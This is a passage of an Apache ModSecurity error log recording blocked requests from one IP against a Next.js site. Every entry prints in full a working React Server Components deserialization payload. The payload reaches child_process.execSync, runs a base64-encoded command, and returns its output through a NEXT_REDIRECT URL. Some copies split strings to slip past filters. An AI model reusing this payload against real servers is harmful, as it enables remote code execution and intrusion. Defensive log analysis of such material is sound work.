16374] [client 195.178.110.31:43266] [client 195.178.110.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _hxdf=process['main' 'Module']['req' 'uire']('chi' 'ld_pro' 'cess')['exec' 'Sync'](Buffer.from('aWQ=','base64').toString()).toString().trim();var _tumn=Buffer.from(_hxdf).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_tumn};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/"] [unique_id "aX7Cai0X30NspmATJTwY2wAAAMg"] [Sun Feb 01 05:03:06.083372 2026] [:error] [pid 16364:tid 16385] [client 195.178.110.31:43266] [client 195.178.110.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _dppb=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _fzko=Buffer.from(_dppb).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_fzko};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/en/"] [unique_id "aX7Cai0X30NspmATJTwY3AAAANM"] [Sun Feb 01 05:03:06.111969 2026] [:error] [pid 16364:tid 16390] [client 195.178.110.31:43266] [client 195.178.110.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _epbk=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _wjka=Buffer.from(_epbk).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_wjka};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/app/"] [unique_id "aX7Cai0X30NspmATJTwY3QAAANg"] [Sun Feb 01 05:03:06.140215 2026] [:error] [pid 16364:tid 16373] [client 195.178.110.31:43266] [client 195.178.110.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _krtt=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _gzlw=Buffer.from(_krtt).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_gzlw};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/api/"] [unique_id "aX7Cai0X30NspmATJTwY3gAAAMc"] [Sun Feb 01 05:03:06.168357 2026] [:error] [pid 16364:tid 16378] [client 195.178.110.31:43266] [client 195.178.110.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _uufw=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _xgqp=Buffer.from(_uufw).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_xgqp};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/_next/"] [unique_id "aX7Cai0X30NspmATJTwY3wAAAMw"] [Sun Feb 01 05:03:06.196957 2026] [:error] [pid 16364:tid 16379] [client 195.178.110.31:43266] [client 195.178.110.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _krpp=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _kiiu=Buffer.from(_krpp).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_kiiu};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/"] [unique_id "aX7Cai0X30NspmATJTwY4AAAAM0"] [Sun Feb 01 05:03:06.225175 2026] [:error] [pid 16364:tid 16387] [client 195.178.110.31:43266] [client 195.178.110.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _hfqn=process['main' 'Module']['req' 'uire']('chi' 'ld_pro' 'cess')['exec' 'Sync'](Buffer.from('aWQ=','base64').toString()).toString().trim();var _xjcy=Buffer.from(_hfqn).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_xjcy};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/"] [unique_id "aX7Cai0X30NspmATJTwY4QAAANU"] [Sun Feb 01 05:03:06.253762 2026] [:error] [pid 16364:tid 16383] [client 195.178.110.31:43266] [client 195.178.110.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _exgs=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _oqbn=Buffer.from(_exgs).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_oqbn};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/en/"] [unique_id "aX7Cai0X30NspmATJTwY4gAAANE"] [Sun Feb 01 05:03:06.282771 2026] [:error] [pid 16364:tid 16381] [client 195.178.110.31:43266] [client 195.178.110.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _ccav=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _knyy=Buffer.from(_ccav).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_knyy};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/app/"] [unique_id "aX7Cai0X30NspmATJTwY4wAAAM8"] [Sun Feb 01 05:03:06.311215 2026] [:error] [pid 16364:tid 16368] [client 195.178.110.31:43266] [client 195.178.110.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _jbeu=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _ifln=Buffer.from(_jbeu).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_ifln};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/api/"] [unique_id "aX7Cai0X30NspmATJTwY5AAAAMI"] [Sun Feb 01 05:03:06.339656 2026] [:error] [pid 16364:tid 16388] [client 195.178.110.31:43266] [client 195.178.110.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _owew=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _mqkv=Buffer.from(_owew).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_mqkv};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/_next/"] [unique_id "aX7Cai0X30NspmATJTwY5QAAANY"] [Sun Feb 01 05:03:06.368178 2026] [:error] [pid 16364:tid 16389] [client 195.178.110.31:43266] [client 195.178.110.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _spff=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _usqd=Buffer.from(_spff).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_usqd};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/"] [unique_id "aX7Cai0X30NspmATJTwY5gAAANc"] [Sun Feb 01 05:03:06.397691 2026] [:error] [pid 16364:tid 16372] [client 195.178.110.31:43266] [client 195.178.110.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _jkcu=process['main' 'Module']['req' 'uire']('chi' 'ld_pro' 'cess')['exec' 'Sync'](Buffer.from('aWQ=','base64').toString()).toString().trim();var _ugtp=Buffer.from(_jkcu).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_ugtp};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/"] [unique_id "aX7Cai0X30NspmATJTwY6AAAAMY"] [Sun Feb 01 05:03:06.424789 2026] [:error] [pid 16364:tid 16371] [client 195.178.110.31:43266] [client 195.178.110.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _yjwt=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _ccgj=Buffer.from(_yjwt).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_ccgj};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/en/"] [unique_id "aX7Cai0X30NspmATJTwY6gAAAMU"] [Sun Feb 01 05:03:06.453472 2026] [:error] [pid 16364:tid 16367] [client 195.178.110.31:43266] [client 195.178.110.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _cgdo=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _ztbr=Buffer.from(_cgdo).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_ztbr};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/app/"] [unique_id "aX7Cai0X30NspmATJTwY6wAAAME"] [Sun Feb 01 05:03:06.482457 2026] [:error] [pid 16364:tid 16384] [client 195.178.110.31:43266] [client 195.178.110.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _jdme=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _pwpr=Buffer.from(_jdme).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_pwpr};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/api/"] [unique_id "aX7Cai0X30NspmATJTwY7AAAANI"] [Sun Feb 01 05:03:06.512013 2026] [:error] [pid 16364:tid 16370] [client 195.178.110.31:43266] [client 195.178.110.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _vlvv=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _fbcr=Buffer.from(_vlvv).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_fbcr};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/_next/"] [unique_id "aX7Cai0X30NspmATJTwY7gAAAMQ"] [Sun Feb 01 05:03:06.540844 2026] [:error] [pid 16364:tid 16375] [client 195.178.110.31:43266] [client 195.178.110.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _yfjx=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _tcsp=Buffer.from(_yfjx).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_tcsp};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/"] [unique_id "aX7Cai0X30NspmATJTwY7wAAAMk"] [Sun Feb 01 05:03:06.570911 2026] [:error] [pid 16364:tid 16366] [client 195.178.110.31:43266] [client 195.178.110.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _ilyc=process['main' 'Module']['req' 'uire']('chi' 'ld_pro' 'cess')['exec' 'Sync'](Buffer.from('aWQ=','base64').toString()).toString().trim();var _ogka=Buffer.from(_ilyc).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_ogka};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/"] [unique_id "aX7Cai0X30NspmATJTwY8AAAAMA"] [Sun Feb 01 05:03:06.599720 2026] [:error] [pid 16364:tid 16382] [client 195.178.110.31:43266] [client 195.178.110.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _evtj=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _mbve=Buffer.from(_evtj).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_mbve};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri 